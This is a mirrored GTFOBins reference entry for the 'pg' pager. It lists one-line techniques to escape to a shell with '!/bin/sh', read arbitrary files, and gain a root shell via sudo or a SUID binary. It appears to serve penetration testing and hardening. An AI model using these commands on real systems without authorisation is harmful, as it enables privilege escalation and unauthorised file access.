1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2026-01-14 19:31:34 +01:00
GTFOBins.github.io/_gtfobins/pg.md
2018-08-24 13:30:23 +02:00

16 lines
260 B
Markdown

---
functions:
execute-interactive:
- code: |
pg /etc/profile
!/bin/sh
file-read:
- code: pg file_to_read
sudo-enabled:
- code: |
sudo pg /etc/profile
!/bin/sh
suid-enabled:
- code: ./pg file_to_read
---